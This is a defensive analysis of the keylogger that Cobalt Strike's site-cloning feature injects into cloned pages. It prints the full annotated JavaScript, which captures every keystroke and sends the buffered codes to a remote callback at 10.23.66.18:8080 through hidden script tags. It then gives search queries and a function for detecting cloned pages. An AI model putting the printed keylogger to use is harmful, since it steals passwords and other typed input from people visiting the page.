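Analysis process
Comparison of the HTML produced by the CS clone with the original HTML
Features:
- The IFRAME tag is in uppercase, and its width and height are 0.
- The script tag loads JS from the path "/jquery/jquery.min.js".
Ordering features:
- When the IFRAME tag and the script tag both appear, the order is always IFRAME tag, script tag, body tag.
- When only one of the IFRAME tag and the script tag appears, it is always before the body tag.
Analysis of the referenced JS: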
```javascript
var cfqPdaQzXzSSf = 0; // counter used to give each created script tag a unique id
window.onload = function loadfqPdaQzXzSSf() { // page-load handler
    lfqPdaQzXzSSf = ","; // buffer of captured key codes
    if (window.addEventListener) { // standard DOM event registration
        document.addEventListener('keypress', pfqPdaQzXzSSf, true); // keypress: keys that produce a character; handler pfqPdaQzXzSSf
        document.addEventListener('keydown', dfqPdaQzXzSSf, true); // keydown: fires when any key is pressed; handler dfqPdaQzXzSSf
    } else if (window.attachEvent) { // attachEvent is supported in IE versions below 9; everything else supports addEventListener
        document.attachEvent('onkeypress', pfqPdaQzXzSSf);
        document.attachEvent('onkeydown', dfqPdaQzXzSSf);
    } else { // neither API is available: assign the handlers directly
        document.onkeypress = pfqPdaQzXzSSf;
        document.onkeydown = dfqPdaQzXzSSf;
    }
}

function pfqPdaQzXzSSf(e) {
    kfqPdaQzXzSSf = (window.event) ? window.event.keyCode : e.which; // window.event exists only while a DOM event handler is being called (legacy IE)
    kfqPdaQzXzSSf = kfqPdaQzXzSSf.toString(16); // convert the key code to its ASCII value as a hex string
    if (kfqPdaQzXzSSf != "d") { // skip "d" (0x0d, Enter); everything else goes to the send function
        fqPdaQzXzSSf(kfqPdaQzXzSSf);
    }
}

function dfqPdaQzXzSSf(e) {
    kfqPdaQzXzSSf = (window.event) ? window.event.keyCode : e.which;
    if (kfqPdaQzXzSSf == 9 || kfqPdaQzXzSSf == 8 || kfqPdaQzXzSSf == 13) { // Tab, Backspace, Enter
        fqPdaQzXzSSf(kfqPdaQzXzSSf);
    }
}

function fqPdaQzXzSSf(kfqPdaQzXzSSf) {
    lfqPdaQzXzSSf = lfqPdaQzXzSSf + kfqPdaQzXzSSf + ","; // append the key code to the buffer
    var tfqPdaQzXzSSf = "ZUyQXfawhPbi" + cfqPdaQzXzSSf;
    cfqPdaQzXzSSf++;
    var ffqPdaQzXzSSf;
    if (document.all && (navigator.appVersion.match(/MSIE ([\d.]+)/)[1]) <= 8.0) { // browser check: IE version less than or equal to 8.0
        ffqPdaQzXzSSf = document.createElement(String.fromCharCode(60) + "script name='" + tfqPdaQzXzSSf + "' id='" + tfqPdaQzXzSSf + "'" + String.fromCharCode(62) + String.fromCharCode(60) + "/script" + String.fromCharCode(62));
    } else {
        ffqPdaQzXzSSf = document.createElement("script");
        ffqPdaQzXzSSf.setAttribute("id", tfqPdaQzXzSSf);
        ffqPdaQzXzSSf.setAttribute("name", tfqPdaQzXzSSf);
    }
    var ejDBFWFHhff = '?id=' + window.location.href.split(/\?id=/)[1]; // take the id parameter from the current page URL
    ffqPdaQzXzSSf.setAttribute("src", "http://10.23.66.18:8080/callback" + ejDBFWFHhff + "&data=" + lfqPdaQzXzSSf);
    ffqPdaQzXzSSf.style.visibility = "hidden";
    document.body.appendChild(ffqPdaQzXzSSf); // attach the script tag, which sends the key codes
    if (kfqPdaQzXzSSf == 13 || lfqPdaQzXzSSf.length > 3000) { // on Enter, or once the buffer exceeds 3000 characters, reset lfqPdaQzXzSSf
        lfqPdaQzXzSSf = ",";
    }
    setTimeout('document.body.removeChild(document.getElementById("' + tfqPdaQzXzSSf + '"))', 5000); // remove the created script tag after a 5-second delay
}
```
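The page-load handler registers handlers for keyboard events. The fqPdaQzXzSSf function sends the key codes to the remote end by creating a script tag.
pfqPdaQzXzSSf function:
Converts the key code to its ASCII code and passes it to the fqPdaQzXzSSf function.
dfqPdaQzXzSSf function:
If the Tab, Backspace or Enter key is pressed, calls the fqPdaQzXzSSf function to send the key code.
Chrome
Key code check
Key code concatenation
JS creates the script tag and sends the key codes to the remote end
Password received on the CS remote end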
360 cyberspace-mapping feature search:
```
response:"<head> <base href=" AND response:"<link rel=\"shortcut icon\" type=\"image/x-icon\" href=\"/favicon.ico\">" AND response:"jquery/jquery.min.js\"></script> </body>"

response:"<head> <base href=" AND response:"<link rel=\"shortcut icon\" type=\"image/x-icon\" href=\"/favicon.ico\">" AND response:"WIDTH=\"0\" HEIGHT=\"0\"></IFRAME>"
```
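The features and search queries above can also be applied locally to a single HTTP response body. The following is an added example, not code from the original page: the function name `checkClonedPage`, the sample pages and the `example.test` host are constructed for illustration, and "body tag" in the ordering features is assumed to mean the closing `</body>`.

```javascript
// Markers from the feature list and search queries above (case-sensitive on purpose).
const MARKERS = {
  base: /<head>\s*<base href=/,
  favicon: /<link rel="shortcut icon" type="image\/x-icon" href="\/favicon\.ico">/,
  iframe: /<IFRAME\b[^>]*\bWIDTH="0"\s+HEIGHT="0"[^>]*><\/IFRAME>/,
  script: /<script\b[^>]*\bsrc="[^"]*\/jquery\/jquery\.min\.js"[^>]*><\/script>/,
};

// Reports which markers a response body contains and whether the
// IFRAME/script placement follows the ordering features.
// Assumption: "body tag" in the ordering features means the closing </body>.
function checkClonedPage(html) {
  const pos = {};
  for (const [name, re] of Object.entries(MARKERS)) pos[name] = html.search(re);
  const bodyEnd = html.lastIndexOf("</body>");

  const injected = [pos.iframe, pos.script].filter((i) => i >= 0);
  let orderOk = injected.length > 0 && bodyEnd >= 0;
  if (injected.some((i) => i > bodyEnd)) orderOk = false; // marker after </body>
  if (pos.iframe >= 0 && pos.script >= 0 && pos.iframe > pos.script) orderOk = false;

  // Same combination as the search queries: base + favicon + (IFRAME or script).
  const match = pos.base >= 0 && pos.favicon >= 0 && orderOk;
  return { hasIframe: pos.iframe >= 0, hasScript: pos.script >= 0, orderOk, match };
}

// Constructed sample responses (not captured traffic); example.test is a placeholder host.
const HEAD = '<html><head> <base href="http://example.test/">' +
  '<link rel="shortcut icon" type="image/x-icon" href="/favicon.ico"></head>';
const SAMPLE_CLONE = HEAD + '<body><form><input name="pw"></form>' +
  '<IFRAME SRC="http://example.test/x" WIDTH="0" HEIGHT="0"></IFRAME>' +
  '<script src="http://example.test/jquery/jquery.min.js"></script> </body></html>';
const SAMPLE_PLAIN = '<html><head><title>t</title></head><body>' +
  '<script src="/jquery/jquery.min.js"></script></body></html>';
const SAMPLE_REORDERED = HEAD + '<body>' +
  '<script src="/jquery/jquery.min.js"></script>' +
  '<IFRAME SRC="/a" WIDTH="0" HEIGHT="0"></IFRAME></body></html>';

console.log(checkClonedPage(SAMPLE_CLONE), checkClonedPage(SAMPLE_PLAIN));
```

A page that only serves its own `/jquery/jquery.min.js` does not match, because the check requires the same `<base href=` and favicon markers that both search queries combine with it.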